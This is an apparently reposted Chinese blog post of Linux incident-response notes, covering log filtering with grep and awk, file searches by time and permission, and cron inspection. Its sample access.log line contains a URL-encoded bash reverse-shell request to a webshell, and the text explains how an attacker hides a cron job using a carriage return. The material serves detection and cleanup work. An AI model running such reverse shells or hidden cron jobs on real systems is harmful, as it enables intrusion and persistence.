应急响应命令(Linux)

news/2024/9/21 4:30:56/文章来源:https://www.cnblogs.com/sdgfsdgfsd/p/18299354 
netstat -anultp  查看进程(用来判断开启了哪些服务等)
ls -al  查看目录下所有文件,包括隐藏文件
ls -alt  查看目录下所有文件,包括隐藏文件,按时间顺序排序
cat  access.log  |  wc -l  查看文件的行数  wc -l是查看文件行数的意思
cat  -e  access.log | grep  1.php  查找accsee.log文件中含有关键字1.php的行
cat  access.log  | grep  -a  1.php 这俩用处一样
awk正则匹配过滤文本命令参考文章
https://blog.csdn.net/weixin_44657888/article/details/134817128

awk [参数] [处理内容] [操作对象] 

例如,access.log日志每行如下
192.168.1.7 - - [24/Apr/2022:15:27:32 +0000] "GET /data/avatar/1.php?2022=bash%20-i%20%3E&%20/dev/tcp/192.168.1.7/1234%200%3E&1 HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"$
访问者ip 时间 请求头 请求路径 URL http版本 状态码  长度
awk  '{print $1}'  access.log  此命令为匹配字段为1的数据并只显示字段为1的数据 
即可筛选出所有IP
grep -v 反选目标
awk '{print $1 $4 $7}' access.log.1 | grep -v 192.168.1.7

 

grep命令
gerp -v  "xxx"  11.txt   反选xxx内容,反选存在xxx内容的这行gerp -i  "xxx"  11.txt 不区分xxx的大小写grep -n "xxx"  11.txt  查找含有xxx内容的行以及行号grep -r "xxx"  搜寻当前目录以及子目录中所有包含xxx的行
awk '{print $1 $4 $7}' access.log.1 | grep -i 192.168.1.5 | grep "/user"组合命令 
find命令
参考文章:
https://zhuanlan.zhihu.com/p/544622346

https://blog.csdn.net/inxunxun/article/details/128164047

https://blog.csdn.net/feyehong/article/details/135829108

find . 或者 find  都是搜当前目录find . -type -f  -perm 777  查找权限为777的文件find .  -name  "*.php"  ! -perm 664
找出当前目录下权限不是644的php文件,感叹号是反选find  -path  指定路径查找文件find  -name "xxx*" 查找当前目录文件名字xxx开头的文件find查找时间对应的文件time单位为天   min单位为分钟
-atime  -amin  xx天/分钟访问过的文件   access
-ctime  -cmin   xx天/分钟改变文件状态的文件   change  
-mtime  -mtim  xx天/分钟改变文件内容的文件   modifyfind .  -type  f   -atime -7
查找最近七天内被访问的文件find . -type f  -atime 7
查找七天前被访问过的所有文件find . -type f -atime +7
搜索超过七天被访问过的所有文件-mtime 0表示查找在今天内被修改过的文件,-mtime -1表示查找在过去一天内被修改过的文件

我们通过stat来判断文件时间信息,当我们再用echo进行重新写入的时候发现文件时间更改了,这里是要注意的点,因为我们有时候需要保证文件时间信息,当你查看文件或者误操作导致文件时间进行了修改那么可能对于对文件判断会有一些操作花费更多的时间,所以这里需要注意。


发现确实是一句话木马文件,我们如果害怕对文件内容不小心做出修改我们也可以使用如下命令进行文件备份操作,使用chattr进行文件锁死,防止文件传播复制。cp  muma.php   muma.php.bakchatter muma.php.bak
crontab -l  查看所有定时任务
crontab -e   查看所有定时任务的隐藏任务
定时任务在/etc/crontab 文件
当前用户的crontab任务列表配置文件。当然也可以直接打开,路径通常是在/var/spool/cron/下,文件以用户名命名,如/var/spool/cron/root
查看隐藏定时任务参考文章:https://cloud.tencent.com/developer/article/2388738
原理:前面已经说过执行crontab -l其实就是执行“cat /var/spool/cron/crontabs/当前登录用户的用户名”,而cat命令自身存在一定缺陷,它会自动识别转义字符,比如执行命令printf "123\r" > 1.txt,
执行完成后使用cat命令读取该文件,如图1-5所示,可以看到无法读取123,只有Vim才可以看见文件的内容,如图1-6所示。那么,攻击者可以利用这个特性,写入一个无法被crontab -l获取的计划任务。

 



 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/742704.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

U7-11课综合练习+12课阶段测评练习——复习练习题目

U7-11课综合练习+12课阶段测评练习——复习练习题目

[2的n次方] 高精度乘法复习资料:https://www.cnblogs.com/jayxuan/p/18287673重复做以下操作 $n $ 次:对每一位乘以 $2 $,然后进位。(当然也可以使用正常的高精度乘法)【参考代码】 #include<bits/stdc++.h> using namespace std;int ans[59]; int main() {int n;ci…
阅读更多...
telegram发卡机器人

telegram发卡机器人

iDataRiver是一家提供telegram发卡机器人的发卡平台,商家上架商品后,自动获得平台提供的免费telegram发卡机器人。iDataRiver是一家提供telegram发卡机器人的发卡平台。 商家上架商品后,自动获得平台提供的免费telegram发卡机器人。 如果希望将机器人头像/名称设置成自己的,…
阅读更多...
发卡网收益如何usdt提现

发卡网收益如何usdt提现

iDataRiver是一家支持直接使用加密货币USDT提现的发卡平台, 支持TRON(波场)、BSC(币安)、ETH(以太坊)区块链。iDataRiver是一家支持直接使用加密货币USDT提现的发卡平台, 支持TRON(波场)、BSC(币安)、ETH(以太坊)区块链。 由于iDataRiver天然的web3属性,加密货币拥有第一原生地…
阅读更多...
《JavaScript权威指南第7版》中文PDF+英文PDF+源代码 +JavaScript权威指南(第6版)(附源码)PDF下载阅读分享推荐

《JavaScript权威指南第7版》中文PDF+英文PDF+源代码 +JavaScript权威指南(第6版)(附源码)PDF下载阅读分享推荐

JavaScript是Web编程语言。绝大多数网站都使用JavaScript,所有现代Web浏览器(无论是桌面、平板还是手机浏览器,书中以后统称为浏览器)都包含JavaScript解释器,这让JavaScript成为有史以来部署最广泛的编程语言。过去十年,Node.js让浏览器之外的JavaScript编程成为可能,N…
阅读更多...
封装 uniapp 请求库的最佳实践

封装 uniapp 请求库的最佳实践

背景 在前端开发中,HTTP 请求是与服务器进行数据交互的核心手段。无论是获取数据还是提交数据,前端应用几乎都离不开 HTTP 请求。在 uniapp 中,uni.request 是官方提供的用于发起 HTTP 请求的基础 API。然而,直接使用 uni.request 存在一些问题和不足,比如:代码冗余:每次…
阅读更多...
FastStone Capture (屏幕截图) v9.2 汉化版

FastStone Capture (屏幕截图) v9.2 汉化版

下载地址:https://www.mediafire.com/file/b6crzq480nyzf8v/FSCapture-9.2-CN.zip/file 软件简介: FastStone Capture 是一款出色的屏幕截图(捕捉)软件,它集图像捕捉、浏览、编辑、视频录制等功能于一身,功能完善、使用方便,值得推荐! 软件提供多种截图方式(如:活动窗…
阅读更多...
9、IDEA集成Github

9、IDEA集成Github

9.1、登录Github账号 9.1.1、打开IDEA的Settings界面如上图所示,打开IDEA的 Settings(设置)界面。 9.1.2、使用账号密码登录(方式一)如上图所示,在“Version Control”->“Github”中,点击“+”按钮,在登录弹窗中,输入GitHub的账号密码直接登录。注意:该方式可能由…
阅读更多...
黑球白球巧妙异或问题

黑球白球巧妙异或问题

题目:一个桶里一共有a个白球和b个黑球。每次拿出2个球,并且每个球被拿出的概率相等。如果拿出一黑一白,就往桶里放进一个黑球;如果拿出两个黑或者两个白,就往桶里放进一个白球。求:最后只剩一个黑球的概率是多少?答案:如果黑球个数是偶数,最后剩下为黑球的概率是0%;如…
阅读更多...
动态条件实现java

动态条件实现java

提交页面设计 json数据格式[{"name": "规则1","action": {"with": [{"type": "SHOW","targets": ["xd_hh_158444776217"]},{"type": "HIDE","targets": [&qu…
阅读更多...
玩一玩yolov5 自己训练模型识别马克杯

玩一玩yolov5 自己训练模型识别马克杯

python 虚拟环境搭建 conda create -n yolo python==3.8yolov5下载 git clone https://github.com/ultralytics/yolov5 cd yolov5 activate yolo pip install -r requirements.txt准备数据集 官方介绍:https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data 建立文件…
阅读更多...
web渗透——信息收集

web渗透——信息收集

切记:未经授权,禁止对任何网站进行渗透测试whois查询 常用网址: 爱站:https://www.aizhan.com/ 站长之家:https://whois.chinaz.com/ bugscaner:http://whois.bugscaner.com/ 端口扫描 常用工具: Nmap工具Masscan CMS识别 常用网址: TideFinger潮汐:http://finger.tides…
阅读更多...
记一次处理挖矿程序xmrig的过程

记一次处理挖矿程序xmrig的过程

现象 挖矿xmrig占用100%CPU处理过程 kill掉进程,后会立即启动# kill pid # kill 14527通过pid找到病毒文件地址 # ls -l /proc/PID/exe找到病毒文件夹目录为 /root/c3pool使用rm删除文件会报权限错误 使用lsattr查看隐藏权限为e表示可以追加 # lsattr miner.sh -------------…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023